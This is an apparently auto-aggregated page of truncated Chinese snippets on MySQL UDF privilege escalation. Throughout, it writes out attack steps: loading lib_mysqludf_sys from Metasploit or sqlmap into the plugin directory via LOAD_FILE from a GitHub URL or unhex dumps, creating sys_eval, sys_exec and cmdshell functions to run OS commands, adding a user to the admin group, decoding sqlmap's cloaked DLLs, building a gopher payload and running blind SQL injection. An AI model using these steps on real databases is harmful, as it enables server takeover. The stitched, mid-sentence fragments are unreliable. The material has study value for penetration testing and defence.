本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果...
) 安装lib_mysqludf_json(lib_mysqludf_json可以把MySQL表的数据以json数据格式输出) wget https://github.com/mysqludf/lib_mysqludf_json.../archive/master.zip unzip master.zip cd lib_mysqludf_json-master/ rm -rf lib_mysqludf_json.so 8、编译...lib_mysqludf_json.c 9、拷贝lib_mysqludf_json.so到MySQL的plugin目录 (可以登陆MySQL,输入命令"show variables like '%plugin...%'"查看plugin位置) cp lib_mysqludf_json.so /usr/local/mysql/lib/plugin/ 演示lib_mysqludf_json功能 登录mysql...RETURNS STRING SONAME "lib_mysqludf_json.so"; CREATE FUNCTION json_values RETURNS STRING SONAME "lib_mysqludf_json.so
LOAD_FILE('https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/mysql/lib_mysqludf_sys..._64.so') into DUMPFILE "/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so"; 我使用的lib_mysqludf_sys_64.so 为metasploit-framework...SELECT hex(LOAD_FILE('/tmp/lib_mysqludf_sys.so')) INTO OUTFILE '/tmp/udf.txt'; cat /tmp/udf.txt select...unhex('7F454[udf内容]xx...') into dumpfile '/usr/local/mysql/lib/plugin/mysqludf.so'; 这里折腾了很久,可能读者不明白我想做什么...create function sys_eval returns string soname "lib_mysqludf_sys_64.so"; select sys_eval('whoami'); #
/www.iodigitalsec.com/mysql-root-to-system-root-with-udf-for-windows-and-linux/ 1、检查文件 /usr/lib/lib_mysqludf_sys.so...是否存在: whereis lib_mysqludf_sys.so 2、如果存在: mysql -u root -p ... mysql> select sys_exec(''); sys_exec...sys_eval 返回标准输出 3、增加用户到管理员组: mysql> select sys_exec('usermod -a -G admin '); 4、如果用户有权限,则复制文件: lib_mysqludf_sys.so...到 /usr/lib/ 目录下 5、如何编译 lib_mysqludf_sys.so : git clone https://github.com/mysqludf/lib_mysqludf_sys...-shared lib_mysqludf_sys.c -o ./lib_mysqludf_sys.so SQL 注入手册 下面是关于下文中数据库对应的字母表: ?
sqlmap自身UDF文件进行异或加密了,使用sqlmap解密一下再使用 python extra/cloak/cloak.py -d -i data/udf/mysql/windows/32/lib_mysqludf_sys.dll...function sys_eval; 补充 UDF提权一般仅适用于windows系统,linux系统由于自身对plugin目录严格的写入权限,很难利用 参考博客链接:(96条消息) 20210415web渗透学习之Mysqludf
udf:sqlmap/data/udf/mysql sqlmap\udf\mysql\windows\32目录下存放着lib_mysqludf_sys.dll_ sqlmap\udf\mysql\windows...\64目录下为64位的lib_mysqludf_sys.dll_ sqlmap 中 自带 的shell 以及一些二进制文件,为了防止被误杀都经过异或方式编码,不能直接使用的。...cloak 目录下,执行命令 python cloak.py -d -i C:\Users\BJernsen\Desktop\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll
sqlmap里面的 select 'It is dll' into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\l ib\plugin\lib_mysqludf_sys.dll...'; (2)创建对应的function: create function sys_eval returns string soname "lib_mysqludf_sys.dll"; (3)执行命令:
| type | +-----------------------+-----+---------------------+----------+ | lib_mysqludf_sys_info...| 0 | lib_mysqludf_sys.so | function | | sys_exec | 0 | lib_mysqludf_sys.so | function
extra\cloak路径下 python cloak.py -d -i C:\Python\Python310\sqlmap-master\data\udf\mysql\windows\64\lib_mysqludf_sys.dll...udf.dll #windows解码 python cloak.py -d -i C:\Python\Python310\sqlmap-master\data\udf\mysql\linux\64\lib_mysqludf_sys.so
使用已经得到的root账号登陆phpmyadmin,执行sql语句创建一个可以执行命令的函数: create function sys_eval returns string soname "lib_mysqludf_sys.dll
之后,查询的操作就从Redis中查找 过程大致如下: 在MySQL中对要操作的数据设置触发器Trigger,监听操作 客户端(NodeServer)向MySQL中写入数据时,触发器会被触发,触发之后调用MySQLUDF
.[*] 192.168.75.121:3306 - Uploading lib_mysqludf_sys_64.so library to /usr/lib64/mysql/plugin/nixZkpEs.so
plugin%'; # 通常是/usr/lib/mysql/plugin/ select unhex('udf.so的⼗六进制') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so...'; create function sys_eval returns string soname 'mysqludf.so'; select sys_eval('whoami'); 生成gopher...db_user = 'root' db_query = "select unhex('udf.so的⼗六进制') into dumpfile'/usr/lib/mysql/plugin/mysqludf.so...';" #db_query = "create function sys_eval returns string soname'mysqludf.so';" #db_query = "select
具体功能可参考文档: http://dev.mysql.com/doc/refman/5.1/en/ha-memcached-interfaces-mysqludf.html 简单测试一下这些函数: #
substring((select concat(username,0x3a,passwd) from users limit 0,1),1,1)) > 64 /*ret true*/ 命令执行:UDF lib_mysqludf_sys.so
注:这里用的是sqlmap的lib_mysqludf_sys.dll,如果sys_eval执行命令返回为Null或sys_exec返回为0时不用管它,其实是已经执行成功了的,也可以选择用MSF的mysql_udf_payload
v3nSecurity' WITH GRANT OPTION; 隧道出网演示: 使用天蝎进行内网穿透 MDUT连接 直接一键提权 navicat可以尝试 整体过程演示 使用MDUT对raven-2 靶机MySQLUDF
sqlmap下的 sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ 就是这个dll文件的编码版本。.../lib_mysqludf_sys.dll_ 即可获得dll文件 然后我们把dll文件放入mysql的插件文件夹,命名为udf.dll。
(3)创建cmdshell 函数,该函数叫什么名字在后续中则使用该函数进行查询:create function cmdshell returns string soname ‘lib_mysqludf_sys.dll
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
腾讯会议
云直播
